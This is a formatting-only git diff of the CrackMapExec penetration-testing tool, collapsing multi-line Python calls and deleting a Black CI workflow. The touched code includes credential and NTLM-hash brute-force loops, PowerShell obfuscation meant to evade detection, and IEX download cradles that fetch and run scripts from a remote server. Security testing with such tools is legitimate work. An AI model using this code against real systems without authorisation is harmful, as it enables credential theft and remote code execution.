diff --git a/.github/workflows/black-formating.yml b/.github/workflows/black-formating.yml
deleted file mode 100644
index ff187e7e..00000000
--- a/.github/workflows/black-formating.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: Black-action
-on: [push, pull_request]
-jobs:
-  linter_name:
-    name: runner / black formatter
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/checkout@v2
-      - uses: rickstaa/action-black@v1
-        with:
-          black_args: ". --check"
\ No newline at end of file
diff --git a/build_collector.py b/build_collector.py
index e8275cb2..ac7aea63 100644
--- a/build_collector.py
+++ b/build_collector.py
@@ -52,9 +52,7 @@ def build_cme():
     [shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")]

     env = Environment(
-        built_at=datetime.utcfromtimestamp(int(time.time())).strftime(
-            "%Y-%m-%d %H:%M:%S"
-        ),
+        built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
         entry_point="cme.crackmapexec:main",
         script=None,
         compile_pyc=False,
@@ -74,9 +72,7 @@ def build_cme():
 def build_cmedb():
     print("building CMEDB")
     env = Environment(
-        built_at=datetime.utcfromtimestamp(int(time.time())).strftime(
-            "%Y-%m-%d %H:%M:%S"
-        ),
+        built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
         entry_point="cme.cmedb:main",
         script=None,
         compile_pyc=False,
diff --git a/cme/cli.py b/cme/cli.py
index 940bae85..67baf27a 100755
--- a/cme/cli.py
+++ b/cme/cli.py
@@ -63,14 +63,10 @@ def gen_cli_args():
     )
     parser.add_argument("--darrell", action="store_true", help="give Darrell a hand")
     parser.add_argument("--verbose", action="store_true", help="enable verbose output")
-    parser.add_argument(
-        "--debug", action="store_true", help="enable debug level information"
-    )
+    parser.add_argument("--debug", action="store_true", help="enable debug level information")
     parser.add_argument("--version", action="store_true", help="Display CME version")

-    subparsers = parser.add_subparsers(
-        title="protocols", dest="protocol", description="available protocols"
-    )
+    subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols")

     std_parser = argparse.ArgumentParser(add_help=False)
     std_parser.add_argument(
@@ -104,17 +100,13 @@ def gen_cli_args():
         default=[],
         help="password(s) or file(s) containing passwords",
     )
-    std_parser.add_argument(
-        "-k", "--kerberos", action="store_true", help="Use Kerberos authentication"
-    )
+    std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication")
     std_parser.add_argument(
         "--use-kcache",
         action="store_true",
         help="Use Kerberos authentication from ccache file (KRB5CCNAME)",
     )
-    std_parser.add_argument(
-        "--log", metavar="LOG", help="Export result into a custom file"
-    )
+    std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file")
     std_parser.add_argument(
         "--aesKey",
         metavar="AESKEY",
@@ -149,9 +141,7 @@ def gen_cli_args():

     module_parser = argparse.ArgumentParser(add_help=False)
     mgroup = module_parser.add_mutually_exclusive_group()
-    mgroup.add_argument(
-        "-M", "--module", action="append", metavar="MODULE", help="module to use"
-    )
+    mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
     module_parser.add_argument(
         "-o",
         metavar="MODULE_OPTION",
         action="append",
         dest="module_options",
         help="module options",
     )
-    module_parser.add_argument(
-        "-L", "--list-modules", action="store_true", help="list available modules"
-    )
+    module_parser.add_argument("-L", "--list-modules",
action="store_true", help="list available modules") module_parser.add_argument( "--options", dest="show_module_options", @@ -197,9 +185,7 @@ def gen_cli_args(): for protocol in protocols.keys(): protocol_object = p_loader.load_protocol(protocols[protocol]["path"]) - subparsers = getattr(protocol_object, protocol).proto_args( - subparsers, std_parser, module_parser - ) + subparsers = getattr(protocol_object, protocol).proto_args(subparsers, std_parser, module_parser) if len(sys.argv) == 1: parser.print_help() diff --git a/cme/cmedb.py b/cme/cmedb.py index 59287af4..f2c2a6f4 100644 --- a/cme/cmedb.py +++ b/cme/cmedb.py @@ -27,9 +27,7 @@ class UserExitedProto(Exception): def create_db_engine(db_path): - db_engine = create_engine( - f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True - ) + db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True) return db_engine @@ -135,9 +133,7 @@ class DatabaseNavigator(cmd.Cmd): # Users if command == "creds": if len(line) < 3: - print( - "[-] invalid arguments, export creds " - ) + print("[-] invalid arguments, export creds ") return filename = line[2] @@ -177,9 +173,7 @@ class DatabaseNavigator(cmd.Cmd): # Hosts elif command == "hosts": if len(line) < 3: - print( - "[-] invalid arguments, export hosts " - ) + print("[-] invalid arguments, export hosts ") return csv_header_simple = ( @@ -226,9 +220,7 @@ class DatabaseNavigator(cmd.Cmd): # Shares elif command == "shares": if len(line) < 3: - print( - "[-] invalid arguments, export shares " - ) + print("[-] invalid arguments, export shares ") return shares = self.db.get_shares() @@ -262,9 +254,7 @@ class DatabaseNavigator(cmd.Cmd): # Local Admin elif command == "local_admins": if len(line) < 3: - print( - "[-] invalid arguments, export local_admins " - ) + print("[-] invalid arguments, export local_admins ") return # These values don't change between simple and detailed @@ -293,9 +283,7 @@ class DatabaseNavigator(cmd.Cmd): print("[+] Local Admins exported") elif command == "dpapi": if len(line) < 3: - print( - "[-] invalid arguments, export dpapi " - ) + print("[-] invalid arguments, export dpapi ") return # These values don't change between simple and detailed @@ -341,9 +329,7 @@ class DatabaseNavigator(cmd.Cmd): filename = line[2] write_list(filename, writable_keys) else: - print( - "[-] Invalid argument, specify creds, hosts, local_admins, shares or dpapi" - ) + print("[-] Invalid argument, specify creds, hosts, local_admins, shares or dpapi") @staticmethod def help_export(): @@ -391,11 +377,7 @@ class DatabaseNavigator(cmd.Cmd): creds = r.json() for cred in creds["creds"]: - if ( - cred["credtype"] == "token" - or cred["credtype"] == "krbtgt" - or cred["username"].endswith("$") - ): + if cred["credtype"] == "token" or cred["credtype"] == "krbtgt" or cred["username"].endswith("$"): continue self.db.add_credential( cred["credtype"], @@ -449,9 +431,7 @@ class CMEDBMenu(cmd.Cmd): self.config.set("CME", "last_used_db", proto) self.write_configfile() try: - proto_menu = getattr(db_nav_object, "navigator")( - self, getattr(db_object, "database")(self.conn), proto - ) + proto_menu = getattr(db_nav_object, "navigator")(self, getattr(db_object, "database")(self.conn), proto) proto_menu.cmdloop() except UserExitedProto: pass @@ -553,9 +533,7 @@ def initialize_db(logger): conn = connect(proto_db_path) c = conn.cursor() # try to prevent some weird sqlite I/O errors - c.execute( - "PRAGMA journal_mode = OFF" - ) # could try setting to PERSIST if DB corruption starts 
occurring + c.execute("PRAGMA journal_mode = OFF") # could try setting to PERSIST if DB corruption starts occurring c.execute("PRAGMA foreign_keys = 1") # set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash c.execute("PRAGMA busy_timeout = 5000") diff --git a/cme/connection.py b/cme/connection.py index 49f10b16..b59f93e3 100755 --- a/cme/connection.py +++ b/cme/connection.py @@ -22,24 +22,10 @@ user_failed_logins = {} def gethost_addrinfo(hostname): try: - for res in getaddrinfo( - hostname, - None, - AF_INET6, - SOCK_DGRAM, - IPPROTO_IP, - AI_CANONNAME, - ): + for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME): af, socktype, proto, canonname, sa = res except socket.gaierror: - for res in getaddrinfo( - hostname, - None, - AF_INET, - SOCK_DGRAM, - IPPROTO_IP, - AI_CANONNAME, - ): + for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME): af, socktype, proto, canonname, sa = res if canonname == "": return sa[0] @@ -96,9 +82,7 @@ class connection(object): try: self.proto_flow() except Exception as e: - self.logger.exception( - f"Exception while calling proto_flow() on target {self.host}: {e}" - ) + self.logger.exception(f"Exception while calling proto_flow() on target {self.host}: {e}") @staticmethod def proto_args(std_parser, module_parser): @@ -174,9 +158,7 @@ class connection(object): context.localip = self.local_ip if hasattr(module, "on_request") or hasattr(module, "has_response"): - self.logger.debug( - f"Module {module.name} has on_request or has_response methods" - ) + self.logger.debug(f"Module {module.name} has on_request or has_response methods") self.server.connection = self self.server.context.localip = self.local_ip @@ -188,10 +170,7 @@ class connection(object): self.logger.debug(f"Module {module.name} has on_admin_login method") module.on_admin_login(context, self) - if ( - not hasattr(module, "on_request") - and not hasattr(module, "has_response") - ) and hasattr(module, "on_shutdown"): + if (not hasattr(module, "on_request") and not hasattr(module, "has_response")) and hasattr(module, "on_shutdown"): self.logger.debug(f"Module {module.name} has on_shutdown method") module.on_shutdown(context, self) @@ -237,9 +216,7 @@ class connection(object): c_id, username, password, cred_type = cred if cred_type == "key": key_data = self.db.get_keys(cred_id=cred_id)[0].data - if self.plaintext_login( - username, password, private_key=key_data - ): + if self.plaintext_login(username, password, private_key=key_data): return True else: # will probably need to add additional checks here for each protocol, but this was initially @@ -262,35 +239,15 @@ class connection(object): elif self.args.domain: domain = self.args.domain - if cred_type == "hash" and not self.over_fail_limit( - username - ): + if cred_type == "hash" and not self.over_fail_limit(username): if self.args.kerberos: - if self.kerberos_login( - domain, - username, - "", - password, - "", - self.kdcHost, - False, - ): + if self.kerberos_login( domain, username, "", password, "", self.kdcHost, False): return True elif self.hash_login(domain, username, password): return True - elif cred_type == "plaintext" and not self.over_fail_limit( - username - ): + elif cred_type == "plaintext" and not self.over_fail_limit(username): if self.args.kerberos: - if self.kerberos_login( - domain, - username, - password, - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( domain, username, password, "", "", 
self.kdcHost, False): return True elif self.plaintext_login(domain, username, password): return True @@ -300,9 +257,7 @@ class connection(object): with sem: username = self.args.username[0] if len(self.args.username) else "" password = self.args.password[0] if len(self.args.password) else "" - self.kerberos_login( - self.domain, username, password, "", "", self.kdcHost, True - ) + self.kerberos_login(self.domain, username, password, "", "", self.kdcHost, True) return True for user in self.args.username: if isfile(user): @@ -319,71 +274,27 @@ class connection(object): with open(ntlm_hash, "r") as ntlm_hash_file: if not self.args.no_bruteforce: for f_hash in ntlm_hash_file: - if not self.over_fail_limit( - usr.strip() - ): + if not self.over_fail_limit(usr.strip()): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - "", - f_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login(self.domain,usr.strip(),"",f_hash.strip(),"",self.kdcHost,False): return True - elif self.hash_login( - self.domain, - usr.strip(), - f_hash.strip(), - ): + elif self.hash_login( self.domain, usr.strip(), f_hash.strip()): return True elif self.args.no_bruteforce: - user_file.seek( - 0 - ) # HACK: this should really not be in the usr for loop - for usr, f_hash in zip( - user_file, ntlm_hash_file - ): - if not self.over_fail_limit( - usr.strip() - ): + user_file.seek(0) # HACK: this should really not be in the usr for loop + for usr, f_hash in zip(user_file, ntlm_hash_file): + if not self.over_fail_limit(usr.strip()): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - "", - f_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), "", f_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, - usr.strip(), - f_hash.strip(), - ): + elif self.hash_login( self.domain, usr.strip(), f_hash.strip()): return True else: # ntlm_hash is a string if not self.over_fail_limit(usr.strip()): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - "", - ntlm_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), "", ntlm_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, - usr.strip(), - ntlm_hash.strip(), - ): + elif self.hash_login( self.domain, usr.strip(), ntlm_hash.strip()): return True elif self.args.password: with sem: @@ -392,89 +303,39 @@ class connection(object): with open(password, "r") as password_file: if not self.args.no_bruteforce: for f_pass in password_file: - if not self.over_fail_limit( - usr.strip() - ): + if not self.over_fail_limit(usr.strip()): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - f_pass.strip(), - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), f_pass.strip(), "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, - usr.strip(), - f_pass.strip(), - ): + elif self.plaintext_login( self.domain, usr.strip(), f_pass.strip()): return True else: - if self.plaintext_login( - usr.strip(), - f_pass.strip(), - ): + if self.plaintext_login( usr.strip(), f_pass.strip()): return True elif self.args.no_bruteforce: - user_file.seek( - 0 - ) # HACK: this should really not be in the usr for loop - for usr, f_pass in zip( - user_file, password_file - ): - if not self.over_fail_limit( - usr.strip() - ): + 
user_file.seek(0) # HACK: this should really not be in the usr for loop + for usr, f_pass in zip(user_file, password_file): + if not self.over_fail_limit(usr.strip()): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - f_pass.strip(), - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), f_pass.strip(), "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, - usr.strip(), - f_pass.strip(), - ): + elif self.plaintext_login( self.domain, usr.strip(), f_pass.strip()): return True else: - if self.plaintext_login( - usr.strip(), - f_pass.strip(), - ): + if self.plaintext_login( usr.strip(), f_pass.strip()): return True else: # password is a string if not self.over_fail_limit(usr.strip()): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - password, - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), password, "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, usr.strip(), password - ): + elif self.plaintext_login(self.domain, usr.strip(), password): return True else: - if self.plaintext_login( - usr.strip(), password - ): + if self.plaintext_login(usr.strip(), password): return True else: # user is a string if hasattr(self.args, "hash") and self.args.hash: @@ -485,36 +346,16 @@ class connection(object): for f_hash in ntlm_hash_file: if not self.over_fail_limit(user): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - "", - ntlm_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, "", ntlm_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, user, f_hash.strip() - ): + elif self.hash_login(self.domain, user, f_hash.strip()): return True else: # ntlm_hash is a string if not self.over_fail_limit(user): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - "", - ntlm_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, "", ntlm_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, user, ntlm_hash.strip() - ): + elif self.hash_login(self.domain, user, ntlm_hash.strip()): return True elif self.args.password: with sem: @@ -525,42 +366,20 @@ class connection(object): if not self.over_fail_limit(user): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - f_pass.strip(), - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, f_pass.strip(), "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, user, f_pass.strip() - ): + elif self.plaintext_login(self.domain, user, f_pass.strip()): return True else: - if self.plaintext_login( - user, f_pass.strip() - ): + if self.plaintext_login(user, f_pass.strip()): return True else: # password is a string if not self.over_fail_limit(user): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - password, - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, password, "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, user, password - ): + elif self.plaintext_login(self.domain, user, password): return True else: if self.plaintext_login(user, password): @@ -569,15 +388,7 
@@ class connection(object): with sem: for aesKey in self.args.aesKey: if not self.over_fail_limit(user): - if self.kerberos_login( - self.domain, - user, - "", - "", - aesKey.strip(), - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, "", "", aesKey.strip(), self.kdcHost, False): return True def mark_pwned(self): diff --git a/cme/crackmapexec.py b/cme/crackmapexec.py index d7e70782..a9108b18 100755 --- a/cme/crackmapexec.py +++ b/cme/crackmapexec.py @@ -32,16 +32,12 @@ from rich.progress import Progress try: import librlers except: - print( - "Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)" - ) + print("Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)") exit(1) def create_db_engine(db_path): - db_engine = sqlalchemy.create_engine( - f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True - ) + db_engine = sqlalchemy.create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True) return db_engine @@ -61,10 +57,7 @@ async def start_run(protocol_obj, args, db, targets): total=total, ) cme_logger.debug(f"Creating thread for {protocol_obj}") - futures = [ - executor.submit(protocol_obj, args, db, target) - for target in targets - ] + futures = [executor.submit(protocol_obj, args, db, target) for target in targets] for future in as_completed(futures): current += 1 progress.update(tasks, completed=current) @@ -95,9 +88,7 @@ def main(): cme_logger.debug(f"Passed args: {args}") if args.darrell: - links = ( - open(path_join(DATA_PATH, "videos_for_darrell.harambe")).read().splitlines() - ) + links = open(path_join(DATA_PATH, "videos_for_darrell.harambe")).read().splitlines() try: webbrowser.open(random.choice(links)) exit(1) @@ -108,9 +99,7 @@ def main(): if args.protocol == "ssh": if args.key_file: if not args.password: - cme_logger.fail( - f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`" - ) + cme_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`") exit(1) if args.use_kcache and not os.environ.get("KRB5CCNAME"): @@ -189,9 +178,7 @@ def main(): exit(0) elif args.module and args.show_module_options: for module in args.module: - cme_logger.display( - f"{module} module options:\n{modules[module]['options']}" - ) + cme_logger.display(f"{module} module options:\n{modules[module]['options']}") exit(0) elif args.module: cme_logger.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}") @@ -205,12 +192,8 @@ def main(): if not module.opsec_safe: if ignore_opsec: - cme_logger.debug( - f"ignore_opsec is set in the configuration, skipping prompt" - ) - cme_logger.display( - f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded" - ) + cme_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt") + cme_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded") else: ans = input( highlight( @@ -254,17 +237,13 @@ def main(): except Exception as e: cme_logger.error(f"Error loading module server for {module}: {e}") - cme_logger.debug( - f"proto_object: {protocol_object}, type: {type(protocol_object)}" - ) + cme_logger.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}") cme_logger.debug(f"proto object dir: {dir(protocol_object)}") # get currently set modules, otherwise default to empty 
list current_modules = getattr(protocol_object, "module", []) current_modules.append(module) setattr(protocol_object, "module", current_modules) - cme_logger.debug( - f"proto object module after adding: {protocol_object.module}" - ) + cme_logger.debug(f"proto object module after adding: {protocol_object.module}") if hasattr(args, "ntds") and args.ntds and not args.userntds: ans = input( diff --git a/cme/first_run.py b/cme/first_run.py index bb2e2821..3a6267a7 100755 --- a/cme/first_run.py +++ b/cme/first_run.py @@ -51,9 +51,7 @@ def first_run_setup(logger=cme_logger): config.get("BloodHound", "bh_enabled") config.get("CME", "log_mode") except (NoSectionError, NoOptionError): - logger.display( - "Old configuration file detected, replacing with new version" - ) + logger.display("Old configuration file detected, replacing with new version") default_path = path_join(DATA_PATH, "cme.conf") shutil.copy(default_path, CME_PATH) diff --git a/cme/helpers/bloodhound.py b/cme/helpers/bloodhound.py index ac291031..89bb4ce0 100644 --- a/cme/helpers/bloodhound.py +++ b/cme/helpers/bloodhound.py @@ -36,24 +36,14 @@ def add_user_bh(user, domain, logger, config): user_owned = info["username"] + "@" + info["domain"] account_type = "User" - result = tx.run( - f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c' - ) + result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c') if result.data()[0]["c"].get("owned") in (False, None): - logger.debug( - f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name' - ) - result = tx.run( - f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name' - ) - logger.highlight( - f"Node {user_owned} successfully set as owned in BloodHound" - ) + logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name') + result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name') + logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound") except AuthError as e: - logger.error( - f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid." - ) + logger.error(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.") return except ServiceUnavailable as e: logger.error(f"Neo4J does not seem to be available on {uri}.") diff --git a/cme/helpers/misc.py b/cme/helpers/misc.py index b88a701e..7d956750 100755 --- a/cme/helpers/misc.py +++ b/cme/helpers/misc.py @@ -36,11 +36,7 @@ def called_from_cmd_args(): for stack in inspect.stack(): if stack[3] == "print_host_info": return True - if ( - stack[3] == "plaintext_login" - or stack[3] == "hash_login" - or stack[3] == "kerberos_login" - ): + if stack[3] == "plaintext_login" or stack[3] == "hash_login" or stack[3] == "kerberos_login": return True if stack[3] == "call_cmd_args": return True diff --git a/cme/helpers/powershell.py b/cme/helpers/powershell.py index 7392fb12..6d5bc08f 100644 --- a/cme/helpers/powershell.py +++ b/cme/helpers/powershell.py @@ -39,17 +39,13 @@ def obfs_ps_script(path_to_script): with open(obfs_ps_script, "r") as script: return script.read() - cme_logger.display( - "Performing one-time script obfuscation, go look at some memes cause this can take a bit..." 
- ) + cme_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...") invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'" cme_logger.debug(invoke_obfs_command) with open(os.devnull, "w") as devnull: - return_code = call( - invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True - ) + return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True) cme_logger.success("Script obfuscated successfully") @@ -65,18 +61,7 @@ def obfs_ps_script(path_to_script): # strip block comments stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read()) # strip blank lines, lines starting with #, and verbose/debug statements - stripped_code = "\n".join( - [ - line - for line in stripped_code.split("\n") - if ( - (line.strip() != "") - and (not line.strip().startswith("#")) - and (not line.strip().lower().startswith("write-verbose ")) - and (not line.strip().lower().startswith("write-debug ")) - ) - ] - ) + stripped_code = "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))]) return stripped_code @@ -167,18 +152,14 @@ else break if obfs_attempts == 4: - cme_logger.error( - f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting." - ) + cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") exit(1) obfs_attempts += 1 else: command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}" if len(command) > 8191: - cme_logger.error( - f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting." - ) + cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") exit(1) return command @@ -221,9 +202,7 @@ if (($injected -eq $False) -or ($inject_once -eq $False)){{ ) if context: - return gen_ps_iex_cradle( - context, "Invoke-PSInject.ps1", ps_code, post_back=False - ) + return gen_ps_iex_cradle(context, "Invoke-PSInject.ps1", ps_code, post_back=False) return ps_code @@ -244,9 +223,7 @@ IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_scri ).strip() elif type(scripts) is list: - launcher = ( - "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n" - ) + launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n" launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'" for script in scripts: launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format( @@ -309,9 +286,7 @@ def invoke_obfuscation(script_string): random_delimiters.append(i) # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. - random_delimiters = [ - choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4)) - ] + random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))] # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
delimited_encoded_array = "" @@ -339,35 +314,13 @@ def invoke_obfuscation(script_string): for delim in random_delimiters: # Random case 'split' string. split = "".join(choice([i.upper(), i.lower()]) for i in "Split") - random_delimiters_to_print_for_dash_split += ( - "-" + split + choice(["", " "]) + "'" + delim + "'" + choice(["", " "]) - ) + random_delimiters_to_print_for_dash_split += "-" + split + choice(["", " "]) + "'" + delim + "'" + choice(["", " "]) - random_delimiters_to_print_for_dash_split = ( - random_delimiters_to_print_for_dash_split.strip("\t\n\r") - ) + random_delimiters_to_print_for_dash_split = random_delimiters_to_print_for_dash_split.strip("\t\n\r") # Randomly select between various conversion syntax options. random_conversion_syntax = [ - "[" - + char_str - + "]" - + choice(["", " "]) - + "[" - + integer - + "]" - + choice(["", " "]) - + "$_", - "[" - + integer - + "]" - + choice(["", " "]) - + "$_" - + choice(["", " "]) - + choice(["-as", "-As", "-aS", "-AS"]) - + choice(["", " "]) - + "[" - + char_str - + "]", + "[" + char_str + "]" + choice(["", " "]) + "[" + integer + "]" + choice(["", " "]) + "$_", + "[" + integer + "]" + choice(["", " "]) + "$_" + choice(["", " "]) + choice(["-as", "-As", "-aS", "-AS"]) + choice(["", " "]) + "[" + char_str + "]", ] random_conversion_syntax = choice(random_conversion_syntax) @@ -387,30 +340,14 @@ def invoke_obfuscation(script_string): # https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables set_ofs_var_syntax = [ - "Set-Item" - + choice([" " * 1, " " * 2]) - + "'Variable:OFS'" - + choice([" " * 1, " " * 2]) - + "''", - choice(["Set-Variable", "SV", "SET"]) - + choice([" " * 1, " " * 2]) - + "'OFS'" - + choice([" " * 1, " " * 2]) - + "''", + "Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "''", + choice(["Set-Variable", "SV", "SET"]) + choice([" " * 1, " " * 2]) + "'OFS'" + choice([" " * 1, " " * 2]) + "''", ] set_ofs_var = choice(set_ofs_var_syntax) set_ofs_var_back_syntax = [ - "Set-Item" - + choice([" " * 1, " " * 2]) - + "'Variable:OFS'" - + choice([" " * 1, " " * 2]) - + "' '", - "Set-Item" - + choice([" " * 1, " " * 2]) - + "'Variable:OFS'" - + choice([" " * 1, " " * 2]) - + "' '", + "Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "' '", + "Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "' '", ] set_ofs_var_back = choice(set_ofs_var_back_syntax) @@ -421,114 +358,16 @@ def invoke_obfuscation(script_string): # Generate the code that will decrypt and execute the payload and randomly select one. baseScriptArray = [ "[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array, - "(" - + choice(["", " "]) - + "'" - + delimited_encoded_array - + "'." 
- + split - + "(" - + choice(["", " "]) - + "'" - + random_delimiters_to_print - + "'" - + choice(["", " "]) - + ")" - + choice(["", " "]) - + "|" - + choice(["", " "]) - + for_each_object - + choice(["", " "]) - + "{" - + choice(["", " "]) - + "(" - + choice(["", " "]) - + random_conversion_syntax - + ")" - + choice(["", " "]) - + "}" - + choice(["", " "]) - + ")", - "(" - + choice(["", " "]) - + "'" - + delimited_encoded_array - + "'" - + choice(["", " "]) - + random_delimiters_to_print_for_dash_split - + choice(["", " "]) - + "|" - + choice(["", " "]) - + for_each_object - + choice(["", " "]) - + "{" - + choice(["", " "]) - + "(" - + choice(["", " "]) - + random_conversion_syntax - + ")" - + choice(["", " "]) - + "}" - + choice(["", " "]) - + ")", - "(" - + choice(["", " "]) - + encoded_array - + choice(["", " "]) - + "|" - + choice(["", " "]) - + for_each_object - + choice(["", " "]) - + "{" - + choice(["", " "]) - + "(" - + choice(["", " "]) - + random_conversion_syntax - + ")" - + choice(["", " "]) - + "}" - + choice(["", " "]) - + ")", + "(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")", + "(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")", + "(" + choice(["", " "]) + encoded_array + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")", ] # Generate random JOIN syntax for all above options new_script_array = [ choice(baseScriptArray) + choice(["", " "]) + join + choice(["", " "]) + "''", join + choice(["", " "]) + 